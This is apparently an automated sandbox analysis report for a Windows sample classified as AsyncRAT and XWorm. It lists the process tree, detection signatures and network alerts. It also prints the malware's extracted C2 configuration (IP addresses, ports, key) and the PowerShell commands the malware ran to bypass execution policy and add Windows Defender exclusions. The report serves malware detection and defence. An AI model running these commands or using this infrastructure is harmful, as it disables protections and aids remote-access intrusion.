Windows Analysis Report
dLRcE11Dkl.exe

Overview

General Information

Sample name: dLRcE11Dkl.exe (renamed because the original name is a hash value)
Original sample name: 7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab.exe
Analysis ID: 1561590
MD5: 68157ed3390faca2a327e25148f4bd97
SHA1: d5fa29334ce471ceac94be49a39d9398b13c8505
SHA256: 7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab
Tags: exe, user-Chainskilabs

Detection

AsyncRAT, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • dLRcE11Dkl.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\dLRcE11Dkl.exe" MD5: 68157ED3390FACA2A327E25148F4BD97)
    • All function.cmd (PID: 5032 cmdline: "C:\Users\user\AppData\Roaming\All function.cmd" MD5: FBD77E256063E3D225B8ECEC3BDBD6DB)
      • Task Manager.exe (PID: 6876 cmdline: "C:\Users\user\AppData\Roaming\Task Manager.exe" MD5: C5ACDDD1F31EA152420CD0BEC24636BA)
        • powershell.exe (PID: 5144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • All function.exe (PID: 1472 cmdline: "C:\Users\user\AppData\Roaming\All function.exe" MD5: 7F9590397ABD938CFD86A9A7A6E51EF6)
        • Ratty_win32_directx11.exe (PID: 2096 cmdline: "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe" MD5: D3565F59BBADCCEDED3D00831AF9B9E9)
        • BLACKGODDOM V.2 GOD BY LA.exe (PID: 5492 cmdline: "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe" MD5: 2B1BCFF698482A45A0D01356AD3E0384)
          • powershell.exe (PID: 5396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E9A629DD7B0ACCDA9D7696FC15135663)
      • powershell.exe (PID: 6596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
XWorm | Malware with a wide range of capabilities, ranging from RAT to ransomware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["45.141.27.222"], "Port": 5000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | matched strings:
  • 0x83c2:$s6: VirtualBox
  • 0x8320:$s8: Win32_ComputerSystem
  • 0x8d88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8e25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8f3a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8a00:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
Source | Rule | Description | Author | Strings
00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | matched strings:
  • 0x2af52:$s6: VirtualBox
  • 0x3b592:$s6: VirtualBox
  • 0x2aeb0:$s8: Win32_ComputerSystem
  • 0x3b4f0:$s8: Win32_ComputerSystem
  • 0x2d06a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x3d6aa:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x2d107:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x3d747:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x2d21c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x3d85c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x2c0ea:$cnc4: POST / HTTP/1.1
  • 0x3c72a:$cnc4: POST / HTTP/1.1
00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | matched strings:
  • 0x32666:$s6: VirtualBox
  • 0x440a6:$s6: VirtualBox
  • 0x325c4:$s8: Win32_ComputerSystem
  • 0x44004:$s8: Win32_ComputerSystem
  • 0x34e05:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x46845:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x34ea2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x468e2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x34fb7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x469f7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x34269:$cnc4: POST / HTTP/1.1
  • 0x45ca9:$cnc4: POST / HTTP/1.1
00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
Source | Rule | Description | Author | Strings
7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | matched strings:
  • 0x83c2:$s6: VirtualBox
  • 0x8320:$s8: Win32_ComputerSystem
  • 0x8d88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8e25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8f3a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8a00:$cnc4: POST / HTTP/1.1
2.2.All function.cmd.2eafcc0.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

                        System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\dLRcE11Dkl.exe, ProcessId: 2848, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 1020, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 6596, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe", ParentImage: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, ParentProcessId: 5492, ParentProcessName: BLACKGODDOM V.2 GOD BY LA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', ProcessId: 5396, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe", ParentImage: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, ParentProcessId: 5492, ParentProcessName: BLACKGODDOM V.2 GOD BY LA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', ProcessId: 5396, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\dLRcE11Dkl.exe", ParentImage: C:\Users\user\Desktop\dLRcE11Dkl.exe, ParentProcessId: 2848, ParentProcessName: dLRcE11Dkl.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 1020, ProcessName: svchost.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 1020, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 6596, ProcessName: powershell.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: "C:\Users\user\AppData\Roaming\All function.cmd", CommandLine: "C:\Users\user\AppData\Roaming\All function.cmd", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\All function.cmd, NewProcessName: C:\Users\user\AppData\Roaming\All function.cmd, OriginalFileName: C:\Users\user\AppData\Roaming\All function.cmd, ParentCommandLine: "C:\Users\user\Desktop\dLRcE11Dkl.exe", ParentImage: C:\Users\user\Desktop\dLRcE11Dkl.exe, ParentProcessId: 2848, ParentProcessName: dLRcE11Dkl.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\All function.cmd", ProcessId: 5032, ProcessName: All function.cmd
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 1020, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 6596, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\dLRcE11Dkl.exe", ParentImage: C:\Users\user\Desktop\dLRcE11Dkl.exe, ParentProcessId: 2848, ParentProcessName: dLRcE11Dkl.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 1020, ProcessName: svchost.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 1020, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 6596, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\dLRcE11Dkl.exe", ParentImage: C:\Users\user\Desktop\dLRcE11Dkl.exe, ParentProcessId: 2848, ParentProcessName: dLRcE11Dkl.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 1020, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T21:09:33.285602+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.6 | 49991 | TCP
2024-11-23T21:09:33.354089+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49991 | 45.141.27.248 | 7777 | TCP
2024-11-23T21:09:32.706821+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49991 | 45.141.27.248 | 7777 | TCP

                        AV Detection

Source: dLRcE11Dkl.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\Task Manager.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\All function.cmd; Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\svchost.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\All function.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["45.141.27.222"], "Port": 5000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe; ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\All function.cmd; ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\Task Manager.exe; ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\svchost.exe; ReversingLabs: Detection: 91%
Source: dLRcE11Dkl.exe; ReversingLabs: Detection: 68%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Task Manager.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\All function.cmd; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\svchost.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\All function.exe; Joe Sandbox ML: detected
Source: dLRcE11Dkl.exe; Joe Sandbox ML: detected
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack; String decryptor: 45.141.27.248
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack; String decryptor: 7777
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack; String decryptor: <123456789>
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack; String decryptor: <Xwormmm>
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack; String decryptor: XWorm V5.4
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack; String decryptor: USB.exe
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack; String decryptor: %AppData%
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack; String decryptor: svchost.exe
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_b3b9f9c2-c
Source: dLRcE11Dkl.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: dLRcE11Dkl.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb; source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb; source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp

                        Networking

Source: Network traffic; Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49991 -> 45.141.27.248:7777
Source: Network traffic; Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.27.248:7777 -> 192.168.2.6:49991
Source: Network traffic; Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49991 -> 45.141.27.248:7777
Source: C:\Users\user\AppData\Roaming\svchost.exe; Network Connect: 208.95.112.1 80
Source: Malware configuration extractor; URLs: 45.141.27.222
Source: Yara match; File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
